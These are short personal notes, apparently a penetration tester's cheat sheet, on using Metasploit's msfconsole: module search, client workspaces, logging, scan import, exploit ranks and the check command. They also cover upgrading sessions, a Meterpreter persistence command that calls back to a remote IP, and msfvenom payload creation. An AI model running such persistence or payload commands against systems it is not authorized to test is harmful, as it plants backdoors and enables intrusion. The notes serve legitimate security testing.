msfconsole
- search X Y
- X being exploit/recon etc..
- Y being service
Ability to create workspace to switch betweens clients/tenants
workspace -a
The only missing feature in the free version is the reporting which can be automated.
set ConsoleLogging true - Allows to save in ~/.msf4/logs the console logs for futur references on write ups save → Save current config to /root/.msf4/config → Again can be usefull when working multiple clients “load” can load additional plugin for example to interface with OpenVAS/Nessus
Start a test campaign
db_status (Vérification)
workspace -a client_name
db_import <various_other_scan> - IN XML
Rank of expoit MEANS chances of crashing the system - Manual/Low rank = HIGH chance of crashing “show payloads” to investigate on what it actually does / Choose if multiple with “set payload X” set XX but also unset Always check if the exploit has a “CHECK” command which check if exploitable WITHOUT actually sending the payloads
“back” for return
“run” for auxiliary
“exploit” for exploits
Once you got a shell always enter sessions -u NBR to upgrade session
Meterpreter
Once you’ve got a shell you can get persistences by running
run persistence -X -i 20 -p 4444 -r <IP>
msfvenom
Tools to create and encode payloads Possible to create .exe files etc..